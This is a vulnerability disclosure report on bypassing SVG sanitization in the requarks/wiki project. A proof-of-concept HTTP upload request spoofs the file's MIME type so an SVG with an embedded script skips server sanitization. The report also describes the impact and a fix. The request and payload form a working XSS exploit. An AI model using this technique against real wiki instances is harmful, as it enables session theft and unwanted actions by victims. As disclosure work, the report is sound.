Cross-site Scripting (XSS) - Reflected in requarks/wiki
Valid
Reported on Dec 20th 2021
Description
SVG sanitization is incomplete. Attackers can bypass the fix in https://github.com/Requarks/wiki/security/advisories/GHSA-3qv4-gp35-rgh7 to perform XSS via malicious SVG files.
Proof of Concept
The fix commit sanitizes an upload only if its MimeType is image/svg+xml. Unfortunately, this value is controlled by the user through the POST request, so an attacker can change the MimeType (from image/svg+xml to image/xxx) to bypass the sanitization check.
POST /u HTTP/1.1
Host: 10.0.2.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.4:3000/e/en/home
Content-Type: multipart/form-data; boundary=---------------------------51434357737717624032908586947
Content-Length: 729
Origin: http://10.0.2.4:3000
Connection: close
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiZW1haWwiOiJhZG1pbkBhZG1pbi5sb2NhbCIsIm5hbWUiOiJBZG1pbmlzdHJhdG9yIiwiYXYiOm51bGwsInR6IjoiQW1lcmljYS9OZXdfWW9yayIsImxjIjoiZW4iLCJkZiI6IiIsImFwIjoiIiwicGVybWlzc2lvbnMiOlsibWFuYWdlOnN5c3RlbSJdLCJncm91cHMiOlsxXSwiaWF0IjoxNjM5Njc3NTkxLCJleHAiOjE2Mzk2NzkzOTEsImF1ZCI6InVybjp3aWtpLmpzIiwiaXNzIjoidXJuOndpa2kuanMifQ.lhEkYJre3SyUa00LACOrLKGgPDJdCol2gs9lI0IPr0VSAaS1x5jIsbhe4DOBeloQDKz2fcJtM8et_FnuKsbW-zKm8BOuE2B0WaAg-fDZ_bAJLAh3qpaYSjO-sYqcgyA6VPLWz595r3ogI_3t7AfjGDaUXpJrheOeN1BE3DQdGDl4SPVV5QbPtl5lm0EDzCdMDNVvr_Ur6MFiE8bhcmf1n8Hyk37FImbVY57Rn503at-XEl--lSqCRT-6KbWAGZ3XWPymoZPRuzTOnVMWw5cnoIoKIpJLnZz3kSsZA0TPsl5SiM6vU5bizPXkSzO8RfxghZoHMvNerBvbyFFKPOhecQ

-----------------------------51434357737717624032908586947
Content-Disposition: form-data; name="mediaUpload"

{"folderId":0}
-----------------------------51434357737717624032908586947
Content-Disposition: form-data; name="mediaUpload"; filename="pwned.svg"
Content-Type: image/svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('SVG PoC');
</script>
</svg>
-----------------------------51434357737717624032908586947--
Impact
This vulnerability is capable of stealing users' cookies and performing unwanted actions on the site via XSS.
Recommended Fix
The MimeType should be validated on the server side instead of being trusted from the request.
Occurrences
haxatron modified the report
assets.js#L102L103